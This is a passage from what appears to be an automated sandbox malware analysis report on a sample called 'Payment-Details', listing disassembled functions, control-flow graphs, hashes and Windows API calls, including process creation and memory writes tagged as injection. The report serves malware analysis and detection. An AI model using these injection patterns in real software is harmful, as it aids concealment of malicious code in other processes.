                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f2ec56ef28a9a0d3c11657578b6ffb9384190eb0c8e541cd9edb6da9f1598e2b
                                        • Instruction ID: 94f468ce8cf30f685c1f6cc401b31e98bbee4237c0ea7bf769ed857d0c1a517c
                                        • Opcode Fuzzy Hash: f2ec56ef28a9a0d3c11657578b6ffb9384190eb0c8e541cd9edb6da9f1598e2b
                                        • Instruction Fuzzy Hash: EE813970D01208CFDB54CFAAD5867ADBBF6FB4A340F109069E519A7269DB349C84CF86
                                        Function 0636B0C4 Relevance: .2, Instructions: 185COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87ad796d0f5f12d7df8937e2c94ff645f9a9fa7634aaf84ebaa08a18dd0da997
                                        • Instruction ID: 6240ba5c51f8b432651f1ff9006f7436df2f8f3365f107b0f55c196556790901
                                        • Opcode Fuzzy Hash: 87ad796d0f5f12d7df8937e2c94ff645f9a9fa7634aaf84ebaa08a18dd0da997
                                        • Instruction Fuzzy Hash: 7F410471E00218CBDBA4CF6AD8407DDBBF6FB89300F10D1AAD50AA3256DB745A95CF90
                                        Function 019FBA10 Relevance: .2, Instructions: 165COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7eb4e1d8d45cde8d2dc61662a2c5e345156d361d0b38d790fcd7ece68a2a7542
                                        • Instruction ID: 29f71e6678a7b82a56be025bf507f3f47ae895a2a0a6f0b3dbbe47323e5d4a75
                                        • Opcode Fuzzy Hash: 7eb4e1d8d45cde8d2dc61662a2c5e345156d361d0b38d790fcd7ece68a2a7542
                                        • Instruction Fuzzy Hash: D171EC709003098FD708DF6AE85579ABBF7FBD8300F14D12AC509AB269EB355895CF91
                                        Function 070E0006 Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a493137ee1eb5fa942f6f0f6d03923d6416c2cc06d09ba017a4f6af78b263c46
                                        • Instruction ID: 193bc919cf4b0e5f18f052539403e9e4951c3d11c5578a06dee35ab4d067c03f
                                        • Opcode Fuzzy Hash: a493137ee1eb5fa942f6f0f6d03923d6416c2cc06d09ba017a4f6af78b263c46
                                        • Instruction Fuzzy Hash: 9E510CB1E006198BEB19CF6BCC4069AFBF7AFC9300F14C1BAD548AB265DB7409858F54
                                        Function 070EA738 Relevance: .1, Instructions: 128COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a9eadca6a78164ee94896f3232c5de4729bd771b58c08bfcacede8051bea5ab
                                        • Instruction ID: 371a55c071432c10f41ec2e869cab88c593f37df702877e63ef2b5b06b45f8ca
                                        • Opcode Fuzzy Hash: 2a9eadca6a78164ee94896f3232c5de4729bd771b58c08bfcacede8051bea5ab
                                        • Instruction Fuzzy Hash: 035169B1E016199BDB08CFABD94059EFBF3AFC8300F14C17AD958AB264DB3459468F50
                                        Function 066F0E44 Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 66f0e44-66f0e4b 1 66f0898-66f08ae 0->1 2 66f0e51-66f0e73 0->2 11 66f08b1 call 63632b0 1->11 12 66f08b1 call 63632a8 1->12 3 66f085a-66f0863 2->3 4 66f0e79-66f0e84 2->4 5 66f086c-66f176e 3->5 6 66f0865 3->6 4->3 5->3 10 66f1774-66f177d 5->10 6->5 7 66f08b3-66f08e4 7->3 8 66f08ea-66f08f5 7->8 8->3 10->3 11->7 12->7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: *$4
                                        • API String ID: 0-449253175
                                        • Opcode ID: 053865832f9e932f79566d2a7866dd4946ce3ab65dcb6149ed33225bfacf0254
                                        • Instruction ID: a578f0b6d32478fff34d278863559de76013efa65a6dd859676bd316bbef3dd4
                                        • Opcode Fuzzy Hash: 053865832f9e932f79566d2a7866dd4946ce3ab65dcb6149ed33225bfacf0254
                                        • Instruction Fuzzy Hash: 7B11B374911258CFEBA0CF08D894BE8B7B5FB09314F5094DAC519A7341C7769E86CF91
                                        Function 066F0C7A Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 13 66f0c7a-66f0c9e 22 66f0ca4 call 66f1d78 13->22 23 66f0ca4 call 66f1d88 13->23 15 66f0caa-66f0ce7 16 66f0ced-66f0cf8 15->16 17 66f085a-66f0863 15->17 16->17 18 66f086c-66f176e 17->18 19 66f0865 17->19 18->17 21 66f1774-66f177d 18->21 19->18 21->17 22->15 23->15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2$B
                                        • API String ID: 0-2979277302
                                        • Opcode ID: d8af22df9e297592966ff7da4cabfce190e872d6edb3a82f5a24f0fc01e91726
                                        • Instruction ID: 4e0f1fa419a049f182612e34d1960bb0b21bf45598f403c6ff826aead9511e0d
                                        • Opcode Fuzzy Hash: d8af22df9e297592966ff7da4cabfce190e872d6edb3a82f5a24f0fc01e91726
                                        • Instruction Fuzzy Hash: 4501783090020ADFEF50CF44C844BE9B776FF06300F008598EA5963211C731AE81CF80
                                        Function 0725026F Relevance: 2.5, Strings: 2, Instructions: 25COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 24 725026f-7250276 25 725027c-72502a5 24->25 26 7254929 24->26 29 7250141-725014c 25->29 30 72502ab-72502b6 25->30 42 725492f call 7256418 26->42 43 725492f call 725640b 26->43 27 7254935-7254957 32 7250155-725201c 29->32 33 725014e-7254769 29->33 30->29 32->29 39 7252022-725202d 32->39 37 7254770-725479f 33->37 38 725476b 33->38 37->29 41 72547a5-72547b0 37->41 38->37 39->29 41->29 42->27 43->27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %$a
                                        • API String ID: 0-177925489
                                        • Opcode ID: b5e7eccdb8a07576dcc930b232e09f34d466357799e7f6077c26da40254e15f3
                                        • Instruction ID: a515ed03159ab2b9657f77264372d865037ac7b883e7f3b7d72880a40889918f
                                        • Opcode Fuzzy Hash: b5e7eccdb8a07576dcc930b232e09f34d466357799e7f6077c26da40254e15f3
                                        • Instruction Fuzzy Hash: E3F037B0A1436ACFCB208F28DC4879AB7B6BB46305F0451EAD90DA2240D3B40EC4CF06
                                        Function 06362891 Relevance: 1.7, APIs: 1, Instructions: 213COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 991 6362891-6362898 992 63628f1-6362950 991->992 993 636289a-63628aa 991->993 998 6362952-636295c 992->998 999 6362989-63629a9 992->999 996 63628b1-63628ce 993->996 997 63628ac 993->997 997->996 998->999 1001 636295e-6362960 998->1001 1006 63629e2-6362a1c 999->1006 1007 63629ab-63629b5 999->1007 1003 6362962-636296c 1001->1003 1004 6362983-6362986 1001->1004 1008 6362970-636297f 1003->1008 1009 636296e 1003->1009 1004->999 1016 6362a55-6362aca CreateProcessA 1006->1016 1017 6362a1e-6362a28 1006->1017 1007->1006 1011 63629b7-63629b9 1007->1011 1008->1008 1010 6362981 1008->1010 1009->1008 1010->1004 1013 63629dc-63629df 1011->1013 1014 63629bb-63629c5 1011->1014 1013->1006 1018 63629c7 1014->1018 1019 63629c9-63629d8 1014->1019 1029 6362ad3-6362b1b 1016->1029 1030 6362acc-6362ad2 1016->1030 1017->1016 1020 6362a2a-6362a2c 1017->1020 1018->1019 1019->1019 1021 63629da 1019->1021 1022 6362a2e-6362a38 1020->1022 1023 6362a4f-6362a52 1020->1023 1021->1013 1025 6362a3c-6362a4b 1022->1025 1026 6362a3a 1022->1026 1023->1016 1025->1025 1027 6362a4d 1025->1027 1026->1025 1027->1023 1035 6362b1d-6362b21 1029->1035 1036 6362b2b-6362b2f 1029->1036 1030->1029 1035->1036 1037 6362b23 1035->1037 1038 6362b31-6362b35 1036->1038 1039 6362b3f-6362b43 1036->1039 1037->1036 1038->1039 1040 6362b37 1038->1040 1041 6362b45-6362b49 1039->1041 1042 6362b53 1039->1042 1040->1039 1041->1042 1043 6362b4b 1041->1043 1044 6362b54 1042->1044 1043->1042 1044->1044
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9f4a07c0baf218099acc96ae6c72298835ec035b91a9fb28af5487d9c813d77
                                        • Instruction ID: 2d9f0af258eb4fe13e455b0aac6f01fd5b9d48922a3676da4cde40a953b6e189
                                        • Opcode Fuzzy Hash: d9f4a07c0baf218099acc96ae6c72298835ec035b91a9fb28af5487d9c813d77
                                        • Instruction Fuzzy Hash: D6813771D007499FDB60CFAAC8817EEBBF2FF48314F158529E858A7294DB748985CB81
                                        Function 063628D4 Relevance: 1.7, APIs: 1, Instructions: 207processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1045 63628d4-6362950 1049 6362952-636295c 1045->1049 1050 6362989-63629a9 1045->1050 1049->1050 1051 636295e-6362960 1049->1051 1055 63629e2-6362a1c 1050->1055 1056 63629ab-63629b5 1050->1056 1053 6362962-636296c 1051->1053 1054 6362983-6362986 1051->1054 1057 6362970-636297f 1053->1057 1058 636296e 1053->1058 1054->1050 1064 6362a55-6362aca CreateProcessA 1055->1064 1065 6362a1e-6362a28 1055->1065 1056->1055 1060 63629b7-63629b9 1056->1060 1057->1057 1059 6362981 1057->1059 1058->1057 1059->1054 1061 63629dc-63629df 1060->1061 1062 63629bb-63629c5 1060->1062 1061->1055 1066 63629c7 1062->1066 1067 63629c9-63629d8 1062->1067 1077 6362ad3-6362b1b 1064->1077 1078 6362acc-6362ad2 1064->1078 1065->1064 1068 6362a2a-6362a2c 1065->1068 1066->1067 1067->1067 1069 63629da 1067->1069 1070 6362a2e-6362a38 1068->1070 1071 6362a4f-6362a52 1068->1071 1069->1061 1073 6362a3c-6362a4b 1070->1073 1074 6362a3a 1070->1074 1071->1064 1073->1073 1075 6362a4d 1073->1075 1074->1073 1075->1071 1083 6362b1d-6362b21 1077->1083 1084 6362b2b-6362b2f 1077->1084 1078->1077 1083->1084 1085 6362b23 1083->1085 1086 6362b31-6362b35 1084->1086 1087 6362b3f-6362b43 1084->1087 1085->1084 1086->1087 1088 6362b37 1086->1088 1089 6362b45-6362b49 1087->1089 1090 6362b53 1087->1090 1088->1087 1089->1090 1091 6362b4b 1089->1091 1092 6362b54 1090->1092 1091->1090 1092->1092
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06362ABA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 50371098846eb4adebd2ebdf498837c0c76843573088c2b51d03483e0af2d5b5
                                        • Instruction ID: 701d6a1fe4dd314bb8d883685f34c29ee1f0c2f56a35fd79c9e74ab39f57f1f7
                                        • Opcode Fuzzy Hash: 50371098846eb4adebd2ebdf498837c0c76843573088c2b51d03483e0af2d5b5
                                        • Instruction Fuzzy Hash: 01813771D006099FDB50CFAAC8857EEBBF2FF48314F158529E858E7284DB748995CB81
                                        Function 063628E0 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1093 63628e0-6362950 1096 6362952-636295c 1093->1096 1097 6362989-63629a9 1093->1097 1096->1097 1098 636295e-6362960 1096->1098 1102 63629e2-6362a1c 1097->1102 1103 63629ab-63629b5 1097->1103 1100 6362962-636296c 1098->1100 1101 6362983-6362986 1098->1101 1104 6362970-636297f 1100->1104 1105 636296e 1100->1105 1101->1097 1111 6362a55-6362aca CreateProcessA 1102->1111 1112 6362a1e-6362a28 1102->1112 1103->1102 1107 63629b7-63629b9 1103->1107 1104->1104 1106 6362981 1104->1106 1105->1104 1106->1101 1108 63629dc-63629df 1107->1108 1109 63629bb-63629c5 1107->1109 1108->1102 1113 63629c7 1109->1113 1114 63629c9-63629d8 1109->1114 1124 6362ad3-6362b1b 1111->1124 1125 6362acc-6362ad2 1111->1125 1112->1111 1115 6362a2a-6362a2c 1112->1115 1113->1114 1114->1114 1116 63629da 1114->1116 1117 6362a2e-6362a38 1115->1117 1118 6362a4f-6362a52 1115->1118 1116->1108 1120 6362a3c-6362a4b 1117->1120 1121 6362a3a 1117->1121 1118->1111 1120->1120 1122 6362a4d 1120->1122 1121->1120 1122->1118 1130 6362b1d-6362b21 1124->1130 1131 6362b2b-6362b2f 1124->1131 1125->1124 1130->1131 1132 6362b23 1130->1132 1133 6362b31-6362b35 1131->1133 1134 6362b3f-6362b43 1131->1134 1132->1131 1133->1134 1135 6362b37 1133->1135 1136 6362b45-6362b49 1134->1136 1137 6362b53 1134->1137 1135->1134 1136->1137 1138 6362b4b 1136->1138 1139 6362b54 1137->1139 1138->1137 1139->1139
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06362ABA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 98dfb5dc3a1f8ea615ef88417523b67d5cc839c8a228ce63d6fac764bbbcbab0
                                        • Instruction ID: 46e56704ca61f2ecfa5385a9af99ac709e41e14a6570d5667b7253bddcedc94c
                                        • Opcode Fuzzy Hash: 98dfb5dc3a1f8ea615ef88417523b67d5cc839c8a228ce63d6fac764bbbcbab0
                                        • Instruction Fuzzy Hash: 83814771D006099FDB50CFAAC8857EEBBF2FF48314F158529E858E7284DB748985CB81
                                        Function 063640A4 Relevance: 1.6, APIs: 1, Instructions: 107fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1140 63640a4-636410e 1143 6364147-63641a9 CreateFileA 1140->1143 1144 6364110-636411a 1140->1144 1153 63641b2-63641f2 1143->1153 1154 63641ab-63641b1 1143->1154 1144->1143 1145 636411c-636411e 1144->1145 1146 6364120-636412a 1145->1146 1147 6364141-6364144 1145->1147 1149 636412e-636413d 1146->1149 1150 636412c 1146->1150 1147->1143 1149->1149 1152 636413f 1149->1152 1150->1149 1152->1147 1159 63641f4-63641f8 1153->1159 1160 6364202 1153->1160 1154->1153 1159->1160 1161 63641fa 1159->1161 1162 6364203 1160->1162 1161->1160 1162->1162
                                        APIs
                                        • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06364199
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: dd29d55e723fc6805ea7a8e3163936285a9d0782635caeca25ef66bc46b2887e
                                        • Instruction ID: be1d099c5f5e6804f5e7a960706d219d0217581f1415192c01baedc4628023e3
                                        • Opcode Fuzzy Hash: dd29d55e723fc6805ea7a8e3163936285a9d0782635caeca25ef66bc46b2887e
                                        • Instruction Fuzzy Hash: E3418471C00359AFDB20CFAAD885BDEBBF1BF08710F14C42AE814A7244CB758895CB91
                                        Function 0636426C Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1163 636426c-63642d9 1166 6364312-636436f CreateFileMappingA 1163->1166 1167 63642db-63642e5 1163->1167 1176 6364371-6364377 1166->1176 1177 6364378-63643b8 1166->1177 1167->1166 1168 63642e7-63642e9 1167->1168 1169 636430c-636430f 1168->1169 1170 63642eb-63642f5 1168->1170 1169->1166 1172 63642f7 1170->1172 1173 63642f9-6364308 1170->1173 1172->1173 1173->1173 1174 636430a 1173->1174 1174->1169 1176->1177 1182 63643ba-63643be 1177->1182 1183 63643c8 1177->1183 1182->1183 1184 63643c0 1182->1184 1185 63643c9 1183->1185 1184->1183 1185->1185
                                        APIs
                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 0636435F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateFileMapping
                                        • String ID:
                                        • API String ID: 524692379-0
                                        • Opcode ID: 699d24b429d2e55c8d142d9f59f1cf31319a7e3f8188f6ab4a3f102cfe4ffcc9
                                        • Instruction ID: b28e0b06eb979ae9f8d2ca71bede012d8b3a4bd306b1bda1f79701fb96e68af8
                                        • Opcode Fuzzy Hash: 699d24b429d2e55c8d142d9f59f1cf31319a7e3f8188f6ab4a3f102cfe4ffcc9
                                        • Instruction Fuzzy Hash: C6417270D00309AFDB64CFAAD8857DEBBF1BF48710F20C529E819A7244CB749895CB91
                                        Function 06364278 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1208 6364278-63642d9 1210 6364312-636436f CreateFileMappingA 1208->1210 1211 63642db-63642e5 1208->1211 1220 6364371-6364377 1210->1220 1221 6364378-63643b8 1210->1221 1211->1210 1212 63642e7-63642e9 1211->1212 1213 636430c-636430f 1212->1213 1214 63642eb-63642f5 1212->1214 1213->1210 1216 63642f7 1214->1216 1217 63642f9-6364308 1214->1217 1216->1217 1217->1217 1218 636430a 1217->1218 1218->1213 1220->1221 1226 63643ba-63643be 1221->1226 1227 63643c8 1221->1227 1226->1227 1228 63643c0 1226->1228 1229 63643c9 1227->1229 1228->1227 1229->1229
                                        APIs
                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 0636435F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateFileMapping
                                        • String ID:
                                        • API String ID: 524692379-0
                                        • Opcode ID: 1f7f5095911bdca602542059827170f51a3aa83bc955824414050102f6d64e3a
                                        • Instruction ID: 925d5fd8dd2c80cc9e2a2e2cbe7ca023e7b81ca0fc0be3c9e70a50f922e2f7b6
                                        • Opcode Fuzzy Hash: 1f7f5095911bdca602542059827170f51a3aa83bc955824414050102f6d64e3a
                                        • Instruction Fuzzy Hash: 14416370D00349EFDB64CFAAC88579EBBF1BF48710F24C529E819AB244DB759855CB80
                                        Function 063640B0 Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1186 63640b0-636410e 1188 6364147-63641a9 CreateFileA 1186->1188 1189 6364110-636411a 1186->1189 1198 63641b2-63641f2 1188->1198 1199 63641ab-63641b1 1188->1199 1189->1188 1190 636411c-636411e 1189->1190 1191 6364120-636412a 1190->1191 1192 6364141-6364144 1190->1192 1194 636412e-636413d 1191->1194 1195 636412c 1191->1195 1192->1188 1194->1194 1197 636413f 1194->1197 1195->1194 1197->1192 1204 63641f4-63641f8 1198->1204 1205 6364202 1198->1205 1199->1198 1204->1205 1206 63641fa 1204->1206 1207 6364203 1205->1207 1206->1205 1207->1207
                                        APIs
                                        • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06364199
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: e5573768290a07db119b75d3430486e537536b1fe0de15f06fde4d8db0766bc7
                                        • Instruction ID: ab15e8cc41e3f2fad44701ed943fcedebdb93a151e90a0362739fe2ef444fb23
                                        • Opcode Fuzzy Hash: e5573768290a07db119b75d3430486e537536b1fe0de15f06fde4d8db0766bc7
                                        • Instruction Fuzzy Hash: 3D416571D003599FDB20DFAAC885BDEBBF1BF48710F14C42AE815A7254CB758895CB90
                                        Function 070ED6E8 Relevance: 1.6, Strings: 1, Instructions: 349COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1230 70ed6e8-70ed6fa 1231 70ed6fc-70ed71d 1230->1231 1232 70ed724-70ed728 1230->1232 1231->1232 1233 70ed72a-70ed72c 1232->1233 1234 70ed734-70ed743 1232->1234 1233->1234 1235 70ed74f-70ed77b 1234->1235 1236 70ed745 1234->1236 1240 70ed9a8-70ed9ef 1235->1240 1241 70ed781-70ed787 1235->1241 1236->1235 1272 70eda05-70eda11 1240->1272 1273 70ed9f1 1240->1273 1242 70ed78d-70ed793 1241->1242 1243 70ed859-70ed85d 1241->1243 1242->1240 1247 70ed799-70ed7a6 1242->1247 1245 70ed85f-70ed868 1243->1245 1246 70ed880-70ed889 1243->1246 1245->1240 1249 70ed86e-70ed87e 1245->1249 1252 70ed8ae-70ed8b1 1246->1252 1253 70ed88b-70ed8ab 1246->1253 1250 70ed7ac-70ed7b5 1247->1250 1251 70ed838-70ed841 1247->1251 1255 70ed8b4-70ed8ba 1249->1255 1250->1240 1257 70ed7bb-70ed7d3 1250->1257 1251->1240 1256 70ed847-70ed853 1251->1256 1252->1255 1253->1252 1255->1240 1258 70ed8c0-70ed8d3 1255->1258 1256->1242 1256->1243 1259 70ed7df-70ed7f1 1257->1259 1260 70ed7d5 1257->1260 1258->1240 1263 70ed8d9-70ed8e9 1258->1263 1259->1251 1267 70ed7f3-70ed7f9 1259->1267 1260->1259 1263->1240 1266 70ed8ef-70ed8fc 1263->1266 1266->1240 1269 70ed902-70ed917 1266->1269 1270 70ed7fb 1267->1270 1271 70ed805-70ed80b 1267->1271 1269->1240 1281 70ed91d-70ed940 1269->1281 1270->1271 1271->1240 1274 70ed811-70ed835 1271->1274 1277 70eda1d-70eda39 1272->1277 1278 70eda13 1272->1278 1275 70ed9f4-70ed9f6 1273->1275 1279 70eda3a-70eda67 1275->1279 1280 70ed9f8-70eda03 1275->1280 1278->1277 1291 70eda7f-70eda81 1279->1291 1292 70eda69-70eda6f 1279->1292 1280->1272 1280->1275 1281->1240 1287 70ed942-70ed94d 1281->1287 1289 70ed99e-70ed9a5 1287->1289 1290 70ed94f-70ed959 1287->1290 1290->1289 1296 70ed95b-70ed971 1290->1296 1315 70eda83 call 70eecb9 1291->1315 1316 70eda83 call 70edb00 1291->1316 1294 70eda73-70eda75 1292->1294 1295 70eda71 1292->1295 1294->1291 1295->1291 1301 70ed97d-70ed996 1296->1301 1302 70ed973 1296->1302 1297 70eda89-70eda8d 1298 70eda8f-70edaa6 1297->1298 1299 70edad8-70edae8 1297->1299 1298->1299 1307 70edaa8-70edab2 1298->1307 1301->1289 1302->1301 1310 70edab4-70edac3 1307->1310 1311 70edac5-70edad5 1307->1311 1310->1311 1315->1297 1316->1297
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: 991bb2639317823448be888ee2d35adab7143f34e980e2914e4ea77730a20b75
                                        • Instruction ID: 4c6bab9fed6e86e6fe3331d0c04895eda634512b7b7abcd88226876b44095d5c
                                        • Opcode Fuzzy Hash: 991bb2639317823448be888ee2d35adab7143f34e980e2914e4ea77730a20b75
                                        • Instruction Fuzzy Hash: 6CD16B71700602CFCB14DF28C88496AB7FAFF89310B29CA69D45A9B355DB34F846CB91
                                        Function 063630F8 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1317 63630f8-636314e 1320 6363150-636315c 1317->1320 1321 636315e-636319d WriteProcessMemory 1317->1321 1320->1321 1323 63631a6-63631d6 1321->1323 1324 636319f-63631a5 1321->1324 1324->1323
                                        APIs
                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06363190
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 3c17685add70dce53317978fd534a7dd968d4953dbd3115c58dc78f14c8ef706
                                        • Instruction ID: a168a6aae54d9516f2eedf585926e95e791dfc365e0141508d6ff5fe5c58880f
                                        • Opcode Fuzzy Hash: 3c17685add70dce53317978fd534a7dd968d4953dbd3115c58dc78f14c8ef706
                                        • Instruction Fuzzy Hash: 682135719003099FDB10DFAAC885BDEBBF5FF48310F10882AE919A7240D778A955DBA0
                                        Function 06364538 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1328 6364538-63645d9 DuplicateHandle 1332 63645e2-6364612 1328->1332 1333 63645db-63645e1 1328->1333 1333->1332
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 063645CC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 927837aabc3eaf8c66211d49fe00cb8eda17ff749c8661d29fb47d8104253b98
                                        • Instruction ID: d5a67167299dc05b6a84e53a92d0e1e275a8cf65720d03c243fc25ce2ae8f784
                                        • Opcode Fuzzy Hash: 927837aabc3eaf8c66211d49fe00cb8eda17ff749c8661d29fb47d8104253b98
                                        • Instruction Fuzzy Hash: 9B21697180034A9FDB10DFAAC881BEEBBF5FF48310F50882AE918A7240D7399555DFA0
                                        Function 06363100 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
